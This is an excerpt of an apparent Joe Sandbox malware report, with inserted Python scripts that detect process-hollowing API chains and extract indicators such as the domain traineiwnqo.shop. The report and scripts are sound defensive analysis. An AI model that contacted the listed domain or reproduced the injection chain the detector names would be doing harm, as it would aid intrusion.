            • Opcode ID: 308bd8ca46db054f66905e9c95e8f78fa54a79f0271e375eeb0f2887be4c4485
            • Instruction ID: b532012a94094a0d1064592630fcd4daadd40f821fedc142ffec915425f4ed4d
            • Opcode Fuzzy Hash: 308bd8ca46db054f66905e9c95e8f78fa54a79f0271e375eeb0f2887be4c4485
            • Instruction Fuzzy Hash: 33915B71D0075D9FEB64CFA8C841BEDBBB2BF48310F148169E919A7240DB749A85CF92

            Control-flow Graph

            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00CF2C38
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 85f6fe4dbc21bee1875e60d2471b7499824c29feea936cf8fb9c1f4455e26350
            • Instruction ID: 6a2c8d2f51aca8b89ee68be148352f14a7f35d07249572b982573960aa20a51e
            • Opcode Fuzzy Hash: 85f6fe4dbc21bee1875e60d2471b7499824c29feea936cf8fb9c1f4455e26350
            • Instruction Fuzzy Hash: 8F2133B5D003499FDB10DFA9C881BEEBBF1FF48310F50842AE969A7251C7799945CBA0

            Control-flow Graph

            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00CF2C38
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 6670afd08240d5ccd8ea4e749065463f1283d16d60e91ca0d28f7c0571ff0727
            • Instruction ID: 6a6bff5f1582a3eedb3483d6426dc05c0ef6e782430a1ae394ef8c8267e27e74
            • Opcode Fuzzy Hash: 6670afd08240d5ccd8ea4e749065463f1283d16d60e91ca0d28f7c0571ff0727
            • Instruction Fuzzy Hash: 7B2135B1D003099FDB10CFA9C881BEEBBF5FB48310F508429E918A7240C7789941CBA0

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: cf2a08-cf2a5b, cf2a5d-cf2a69, cf2a6b-cf2a9b (Wow64SetThreadContext), cf2a9d-cf2aa3, cf2aa4-cf2ad4.
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00CF2A8E
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 5aae4ad406a02e940443322b196be2f67fafc6720f16089b69e179772314cf9d
            • Instruction ID: 089beae5fcf7a5f77debd254763b97daf38ccbfd4681ef68f8894ff9c6ab1ad9
            • Opcode Fuzzy Hash: 5aae4ad406a02e940443322b196be2f67fafc6720f16089b69e179772314cf9d
            • Instruction Fuzzy Hash: 8C215971D003098FDB24CFAAC485BEEBBF4AF48310F54842DD959A7241CB789945CFA1

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: cf2c91-cf2d25 (ReadProcessMemory), cf2d27-cf2d2d, cf2d2e-cf2d5e.
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CF2D18
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: a01e2443e90e553754a70a367c87ba8d8d698f02f9df213557389c2d8493c947
            • Instruction ID: c5e8037ad48433cb6d9c0b6bebdeb35ae3a853c5cd79a49a74b350e749df364e
            • Opcode Fuzzy Hash: a01e2443e90e553754a70a367c87ba8d8d698f02f9df213557389c2d8493c947
            • Instruction Fuzzy Hash: 7721F375C002499FDB10DFAAC881BEEBBB5FF48320F50842EE959A7250C7799905CBA1

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: cf2c98-cf2d25 (ReadProcessMemory), cf2d27-cf2d2d, cf2d2e-cf2d5e.
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CF2D18
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 7f4bfebe6692b70da97b64368a9377db8963637a8afc27e0481b59a62922453e
            • Instruction ID: d48028ab7c719e2e1b913f5d6e326822ae3915ea2e99c12f15339a21ff5c6bdb
            • Opcode Fuzzy Hash: 7f4bfebe6692b70da97b64368a9377db8963637a8afc27e0481b59a62922453e
            • Instruction Fuzzy Hash: 85211671C003499FDB10DFAAC881BEEBBF5FF48310F50842AE919A7240C7799901CBA5

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: cf2a10-cf2a5b, cf2a5d-cf2a69, cf2a6b-cf2a9b (Wow64SetThreadContext), cf2a9d-cf2aa3, cf2aa4-cf2ad4.
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00CF2A8E
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 1d0dc05595888a92eb81c85a4583329304e6050d61ad13f3b2960b8200bebad4
            • Instruction ID: 5dd0ffd85a56cc481c79785170ad09e1ab333b0cef02890dee345e68afd4f711
            • Opcode Fuzzy Hash: 1d0dc05595888a92eb81c85a4583329304e6050d61ad13f3b2960b8200bebad4
            • Instruction Fuzzy Hash: 05212971D003098FDB24DFAAC485BEEBBF4EF48324F548429D559A7240CB789945CFA5

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: cf2ae0-cf2b63 (VirtualAllocEx), cf2b65-cf2b6b, cf2b6c-cf2b91.
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00CF2B56
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: e40ca757b969a3c2f9fbf7967693eec31edab9b6aa6762f7548d2b0b258112b9
            • Instruction ID: 9439774e9e17f4f5aa0d29a8f62d2b132040ca245515af7dcd5e063732c1728e
            • Opcode Fuzzy Hash: e40ca757b969a3c2f9fbf7967693eec31edab9b6aa6762f7548d2b0b258112b9
            • Instruction Fuzzy Hash: 8C115675C002488FDB20DFAAC845BEEBBF5AB48320F108419E926A7250C7799901CFA0

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: cf2958-cf29cf (ResumeThread), cf29d1-cf29d7, cf29d8-cf29fd.
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: bda6d60a69e393ccd6eeb6b86e5b734166d3c6cfb7f88a636c0ab2492dcc7676
            • Instruction ID: e17ece61a7aab04b17460bea8f71a5f3f76c9905818764e76c241c8eaaa4ed4c
            • Opcode Fuzzy Hash: bda6d60a69e393ccd6eeb6b86e5b734166d3c6cfb7f88a636c0ab2492dcc7676
            • Instruction Fuzzy Hash: C9117970C003488FDB20DFAAC4457EEFBF4AB48314F20841DC455A3240C7795905CF90

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: cf2ae8-cf2b63 (VirtualAllocEx), cf2b65-cf2b6b, cf2b6c-cf2b91.
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00CF2B56
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 8308fbc7046a509bd6a77ee9e8bb6d0a2297fb6900bd890c92b89929f34ad904
            • Instruction ID: eb183253649c05b64fe6a378337f39c30966282863857b6e2c7eed7f05a1d262
            • Opcode Fuzzy Hash: 8308fbc7046a509bd6a77ee9e8bb6d0a2297fb6900bd890c92b89929f34ad904
            • Instruction Fuzzy Hash: 20112675C003499FDB20DFAAC845BEEBBF5EB48320F148419E929A7250CB759941CFA5

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: cf2960-cf29cf (ResumeThread), cf29d1-cf29d7, cf29d8-cf29fd.
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 7287101b38b9e1c5b13154dfe39834b86a1c581b3f8a2d6742bd813bf4fb095e
            • Instruction ID: 517a6526ad23ddf8e31359ec5b2aa39eb2f4aa22c299f5f69a3270e20349b9cc
            • Opcode Fuzzy Hash: 7287101b38b9e1c5b13154dfe39834b86a1c581b3f8a2d6742bd813bf4fb095e
            • Instruction Fuzzy Hash: 2C116A71D003498FDB20DFAAC4457AEFBF4EB48320F108419D559A7340CB756941CFA4
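The process-0 records above enumerate, function by function, the call set of a suspended-process injection (RunPE / process hollowing): CreateProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext and ResumeThread. The Python script below is an added triage example, not part of the Joe Sandbox report or of the analysed sample: it parses the report's "APIs" reference lines into records, collapses the duplicate references the report prints once per function entry point (the cf2ba0/cf2ba8 and cf2c91/cf2c98 pairs), and checks the resulting API set against the hollowing chain. The input is constructed from the records above; CreateProcess and ResumeThread, which this excerpt names only in "API ID" fields without a call-site line, are passed in separately.

```python
"""Triage helper for Joe Sandbox 'APIs' reference lines (added example, not
part of the report).  Parses lines such as
    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00CF2C38
into records, drops duplicate references, and checks the API set against the
process-hollowing (RunPE) call chain."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set, Tuple

# One call-site line: API.MODULE(arg,arg,...), ref: ADDRESS   ('?' = unresolved value)
API_REF = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*"
    r"(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: Tuple[Optional[int], ...]  # None where the report printed '?'
    ref: int                         # call-site address


def parse_refs(text: str) -> List[ApiRef]:
    """Parse every reference line in a report excerpt; exact duplicates are kept once."""
    seen: Set[ApiRef] = set()
    out: List[ApiRef] = []
    for line in text.splitlines():
        m = API_REF.match(line)
        if not m:
            continue
        args = tuple(
            None if a.strip() == "?" else int(a, 16)
            for a in m.group("args").split(",") if a.strip()
        )
        rec = ApiRef(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))
        if rec not in seen:
            seen.add(rec)
            out.append(rec)
    return out


# Each step lists equivalent Win32 and native exports; any one of them satisfies the step.
HOLLOWING_STEPS = [
    ("spawn target (suspended)", {"CreateProcess", "CreateProcessA", "CreateProcessW",
                                  "CreateProcessInternalW", "NtCreateUserProcess"}),
    ("allocate in target", {"VirtualAllocEx", "NtAllocateVirtualMemory", "ZwAllocateVirtualMemory"}),
    ("write payload into target", {"WriteProcessMemory", "NtWriteVirtualMemory", "ZwWriteVirtualMemory"}),
    ("redirect thread entry", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume target", {"ResumeThread", "NtResumeThread"}),
]
# Common in hollowing loaders but not required for the verdict.
HOLLOWING_OPTIONAL = [
    ("read target memory/context", {"ReadProcessMemory", "NtReadVirtualMemory",
                                    "GetThreadContext", "Wow64GetThreadContext"}),
    ("unmap original image", {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
]


def assess_hollowing(refs: Iterable[ApiRef], extra: Iterable[str] = ()) -> Dict[str, object]:
    """Map the observed API names (plus any named elsewhere in the report) onto the chain."""
    names = {r.api for r in refs} | set(extra)
    matched = {step: sorted(names & alts) for step, alts in HOLLOWING_STEPS if names & alts}
    missing = [step for step, alts in HOLLOWING_STEPS if not names & alts]
    optional = {step: sorted(names & alts) for step, alts in HOLLOWING_OPTIONAL if names & alts}
    return {
        "verdict": "process hollowing / RunPE chain complete" if not missing
                   else "partial injection chain",
        "matched": matched,
        "missing": missing,
        "optional": optional,
        "wow64_context": "Wow64SetThreadContext" in names,
    }


# Constructed input: the 'APIs' lines of the process-0 records (duplicates included on purpose).
SAMPLE = """
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00CF2C38
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00CF2C38
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00CF2A8E
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CF2D18
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CF2D18
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00CF2B56
"""
# APIs the excerpt names only in 'API ID' fields, without a call-site line.
REPORT_API_IDS = {"CreateProcess", "ResumeThread"}

if __name__ == "__main__":
    refs = parse_refs(SAMPLE)
    for r in refs:
        print(f"{r.api:<24} {r.module:<11} ref={r.ref:#010x} args={r.args}")
    print(assess_hollowing(refs, REPORT_API_IDS))
```

The alternatives table treats Wow64SetThreadContext as equivalent to SetThreadContext and the Nt*/Zw* native exports as equivalent to their Win32 wrappers, so the same check applies to samples that resolve ntdll directly. NtUnmapViewOfSection is reported when present but not required, since several RunPE variants skip it; the report's process-0 records do not list it.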
            Memory Dump Source
            • Source File: 00000000.00000002.1252917437.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c9d000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3d13f5eb45b2f392b5a96c124572f39ee06dc934c3181a54565ad664900b88f3
            • Instruction ID: df77009957ecd7ff40376ec6f4fdefe79ecaf9f97d95130a21459bdff8428de1
            • Opcode Fuzzy Hash: 3d13f5eb45b2f392b5a96c124572f39ee06dc934c3181a54565ad664900b88f3
            • Instruction Fuzzy Hash: E801F7314083449AEB204A12CCC8B66BB98EF40365F14C05AED1A2A2C3C2349844CAF9
            Memory Dump Source
            • Source File: 00000000.00000002.1252917437.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c9d000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1506f324d1a8792ed746b022559ef882026892fed8f0635cc230040f7b43940f
            • Instruction ID: 58d9514b61870d2e95617a7fb016b909532b56dd8e5d7c7b508a881b42fccd35
            • Opcode Fuzzy Hash: 1506f324d1a8792ed746b022559ef882026892fed8f0635cc230040f7b43940f
            • Instruction Fuzzy Hash: 91F0CD71408344AEEB208A06CCC8B66FF98EB90734F18C05EED191B2C3C278AC40CAB5

            Execution Graph

            Execution Coverage:2.7%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:36.9%
            Total number of Nodes:122
            Total number of Limit Nodes:13
• Rendered graph not reproduced. Roots and the API calls reached from them, as recorded in the graph data: 433de3 (LoadLibraryExW); 409930 (GetCurrentProcess, ExitProcess, GetWindowInfo, FreeLibrary, CoUninitialize); 40a810 (LoadLibraryExW, CoInitializeEx, CoInitializeSecurity, RtlFreeHeap); 40ce00 (GetSystemDirectoryW, RtlFreeHeap); 432111 (RtlAllocateHeap); 42eb21 (SysAllocString, CoSetProxyBlanket, SysFreeString, CoCreateInstance, GetVolumeInformationW); 42e876 (VariantInit, VariantClear, SysStringLen, SysFreeString); 43406b, 432590, 432660 and 435ef0 (LdrInitializeThunk via 433fa0).

Control-flow Graph

• Rendered graph not reproduced. Function entry 42eb21, basic blocks spanning 42eb20-42f2bb. API-calling blocks: 42eb9c SysAllocString; 42ebd1 CoSetProxyBlanket; 42ec59 SysAllocString; 42ed0c SysAllocString; 42ed3d SysFreeString * 2; 42ed5c SysFreeString; 42ef06 GetVolumeInformationW; 42ef57 CoCreateInstance; 42ef6f CoCreateInstance. Internal calls to 4354e0, 435ef0, 432140, 432400, 432420, 432590, 432660, 432080 and 433fa0.
            APIs
            • SysAllocString.OLEAUT32(?), ref: 0042EB9D
            • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0042EBE2
            • SysAllocString.OLEAUT32(29DD2BDD), ref: 0042EC5D
            • SysAllocString.OLEAUT32(29DD2BDD), ref: 0042ED0D
            • SysFreeString.OLEAUT32(?), ref: 0042ED49
            • SysFreeString.OLEAUT32(?), ref: 0042ED51
            • SysFreeString.OLEAUT32(?), ref: 0042ED62
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: String$AllocFree$BlanketProxy
            • String ID: 4`[b$7654$/.-$B
            • API String ID: 3215672481-2456291547
            • Opcode ID: 1f52f75ee9fbd9a2817593f0f2cd6b7df647ac44ab142d147d39e02bf424dc0f
            • Instruction ID: d208b6dcd48daf2608e56d970aedca86ac8594f7c4363f7bc0ec2ba55e37e436
            • Opcode Fuzzy Hash: 1f52f75ee9fbd9a2817593f0f2cd6b7df647ac44ab142d147d39e02bf424dc0f
            • Instruction Fuzzy Hash: C612DC70A00700DFEB24CF29D891B6ABBF1FF49304F50892DE5969B7A1D779A805CB58

Control-flow Graph

• Rendered graph not reproduced. Function entry 43406b, basic blocks spanning 43406b-434929, no Windows API calls; internal calls to 435cf0, 4333f0, 434800 and 433fa0.
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: %sgh$0mrs$4`[b$GC
            • API String ID: 0-977343894
            • Opcode ID: fc32d9ced189cf6374c410164aff830010b6ef61b34dd62e774bd4f35da11266
            • Instruction ID: 98d9df69f66ed30905ed8ad65f3aad93e7dedcb94b99b17d03a419621e4ea0be
            • Opcode Fuzzy Hash: fc32d9ced189cf6374c410164aff830010b6ef61b34dd62e774bd4f35da11266
            • Instruction Fuzzy Hash: 06328DB4E0021ACBDB14CF98D9917BEB7B1FF8A300F245569D8516B391D338AD51CBA8

Control-flow Graph

• Rendered graph not reproduced. Single basic block 433fa0-433fd2 (LdrInitializeThunk).
            APIs
            • LdrInitializeThunk.NTDLL(004347CA,00000000,00000004,000000FF,00000028,?,0000000C), ref: 00433FCE
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Control-flow Graph

• Rendered graph not reproduced. Function entry 42e876, basic blocks spanning 42e876-42ed80. API-calling blocks: 42e892 VariantInit; 42e948 SysStringLen; 42eb02 VariantClear; 42eb12 SysFreeString * 2; 42ed5c SysFreeString. Internal calls to 4091d0, 426160 and 4091c0.
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: String$Free$Variant$ClearInit
            • String ID: B
            • API String ID: 4205145696-3806887055
            • Opcode ID: 21028c80cd4026167bb69fda4869c2a8315c8d17ec0b3906e11f670861941946
            • Instruction ID: fcfcb4cb4f68b1e8097e57e2e1d3c881d061160ce27179147b48dec2388d3295
            • Opcode Fuzzy Hash: 21028c80cd4026167bb69fda4869c2a8315c8d17ec0b3906e11f670861941946
            • Instruction Fuzzy Hash: 728166B4604B00CFD724CF25D881B66B7A2FF5A304F44892ED49A8BBA1D735F846CB45
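The RegAsm (process 3) records on this page carry the strings each function references in the "String ID" field, joined with "$": mostly short fragments of the decrypted binary, but also a 32-hex token and the domain traineiwnqo.shop in the LoadLibraryExW function that follows. The CoSetProxyBlanket arguments recorded above (0000000A, 00000000, 00000000, 00000003, 00000003, 00000000, 00000000) are the canonical WMI client setup, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE and EOAC_NONE, which together with the CoCreateInstance and SysAllocString/SysFreeString calls is consistent with the WMI-based BIOS and baseboard queries in the report's signature list. The Python script below is an added example, not part of the report: it groups each "String ID" under the snapshot it belongs to (process index, state and image base are encoded in the snapshot file name), classifies tokens by shape as domain, 32-hex identifier or fragment, and emits defanged indicators attributed to their process. The excerpt is constructed from the records on this page; the report does not say what the 32-hex token is, so the script labels it only by shape.

```python
"""Indicator extraction from Joe Sandbox 'String ID' fields (added example, not
part of the report).  Groups each function's '$'-joined string list under the
snapshot it came from, classifies the tokens and emits defanged indicators."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# • Snapshot File: hcaresult_<pid>_<state>_<base>_<image>.jbxd
SNAPSHOT = re.compile(
    r"^\s*[•*-]?\s*Snapshot File:\s*hcaresult_(?P<pid>\d+)_(?P<state>\d+)_"
    r"(?P<base>[0-9a-fA-F]+)_(?P<image>.+?)\.jbxd\s*$"
)
# Anchored at line start so that '• API String ID: ...' matches neither pattern.
API_ID = re.compile(r"^\s*[•*-]?\s*API ID:\s*(?P<value>.*?)\s*$")
STRING_ID = re.compile(r"^\s*[•*-]?\s*String ID:\s*(?P<value>.*?)\s*$")
# Hostname: one or more labels without leading/trailing hyphen, alphabetic TLD.
DOMAIN = re.compile(r"^(?:(?!-)[a-z0-9-]{1,63}(?<!-)\.)+[a-z]{2,24}$", re.I)
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)


@dataclass
class FunctionRecord:
    pid: int
    image: str
    base: int
    api_id: str = ""
    tokens: List[str] = field(default_factory=list)


def classify(token: str) -> str:
    """Shape-based label: 'hex32', 'domain' or 'fragment' (obfuscation leftovers)."""
    if HEX32.match(token):
        return "hex32"
    if DOMAIN.match(token):
        return "domain"
    return "fragment"


def defang(value: str) -> str:
    return value.replace(".", "[.]")


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per 'Snapshot File' line, carrying the API ID and String ID that follow it."""
    records: List[FunctionRecord] = []
    current = None
    for line in text.splitlines():
        m = SNAPSHOT.match(line)
        if m:
            current = FunctionRecord(int(m["pid"]), m["image"], int(m["base"], 16))
            records.append(current)
            continue
        if current is None:
            continue
        m = API_ID.match(line)
        if m:
            current.api_id = m["value"]
            continue
        m = STRING_ID.match(line)
        if m:
            current.tokens = [t for t in m["value"].split("$") if t]
    return records


def extract_iocs(text: str) -> List[Dict[str, object]]:
    """Non-fragment tokens, de-duplicated, each attributed to the process/base it was found in."""
    out: List[Dict[str, object]] = []
    seen = set()
    for rec in parse_records(text):
        for tok in rec.tokens:
            kind = classify(tok)
            if kind == "fragment" or (kind, tok) in seen:
                continue
            seen.add((kind, tok))
            out.append({
                "kind": kind,
                "value": tok,
                "defanged": defang(tok) if kind == "domain" else tok,
                "process": f"{rec.pid}/{rec.image}",
                "base": rec.base,
                "api_id": rec.api_id,
            })
    return out


# Constructed excerpt: the Snapshot/API ID/String ID lines of three RegAsm records on this page.
SAMPLE = """
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
• API ID: String$AllocFree$BlanketProxy
• String ID: 4`[b$7654$/.-$B
• API String ID: 3215672481-2456291547
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
• API ID:
• String ID: %sgh$0mrs$4`[b$GC
• API String ID: 0-977343894
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
• API ID: LibraryLoad
• String ID: 7641A8A9550F401098A04E632013B2C2$B$traineiwnqo.shop
• API String ID: 1029625771-3315110752
"""

if __name__ == "__main__":
    for ioc in extract_iocs(SAMPLE):
        print(f"{ioc['kind']:<7} {ioc['defanged']:<40} {ioc['process']} "
              f"base={ioc['base']:#x} ({ioc['api_id']})")
```

Because "$" is both the report's separator and a legal character inside a referenced string, a token split this way can occasionally be a half of a longer string; the shape filters above are deliberately strict (full hostname with an alphabetic TLD, exactly 32 hex digits) so that such halves fall through as fragments rather than becoming false indicators.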

Control-flow Graph

• Rendered graph not reproduced. Function entry 40a810, basic blocks spanning 40a810-40aff6. API-calling blocks: 40a8a6 LoadLibraryExW; 40ad48 CoInitializeEx; 40ad5a CoInitializeSecurity. Internal calls to 4333d0, 4354e0 (* 12), 42f2c0, 40b000, 40cc80, 40b5e0, 42e700 and 432140.
            APIs
            • LoadLibraryExW.KERNELBASE(137B118F,00000000,00000800), ref: 0040A8B2
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: 7641A8A9550F401098A04E632013B2C2$B$traineiwnqo.shop
            • API String ID: 1029625771-3315110752
            • Opcode ID: 34d17edaf40d782ec67320f1e2a09a68fcafa89bbacd7ef14cc55d2e69128cac
            • Instruction ID: 8bf3c8a0dc5432b79849cedbee025762e94b3ba7f0271e702e969951a62f6cf0
            • Opcode Fuzzy Hash: 34d17edaf40d782ec67320f1e2a09a68fcafa89bbacd7ef14cc55d2e69128cac
            • Instruction Fuzzy Hash: 5912BFB01083409FE710DF15D84076EBBE1AF92309F088A2EE5D56B392D7798965CF9B

            Control-flow Graph

            Control-flow graph (graph edge list omitted): function 409930, basic blocks 409930-409998; API calls GetCurrentProcess (block 409949-409956), GetWindowInfo (block 40995a-409977), ExitProcess (block 40998c-409998); calls to internal functions 4099a0, 433410, 429cb0, 40a810, 433ec0, 40ce00, 40bcf0.
            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Process$CurrentExit
            • String ID:
            • API String ID: 2333725396-0
            • Opcode ID: 9e9a532d26983c7b588b4a1bc287a377aacdea2b97869028e39f574fbfbb0ff6
            • Instruction ID: 85d1f0525f93d6271b7d803b59661970475abf974338680b697f46506254df6e
            • Opcode Fuzzy Hash: 9e9a532d26983c7b588b4a1bc287a377aacdea2b97869028e39f574fbfbb0ff6
            • Instruction Fuzzy Hash: 02F082B14082108ACA103B728A0632FBB685F1231AF00053FFC82713C3EB3C4D165AAF

            Control-flow Graph

            Control-flow graph (graph edge list omitted): function 433de3, basic blocks 433de3-433e99; API call LoadLibraryExW (block 433e5a-433e67); no internal calls.
            APIs
            • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 00433E62
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: s
            • API String ID: 1029625771-453955339
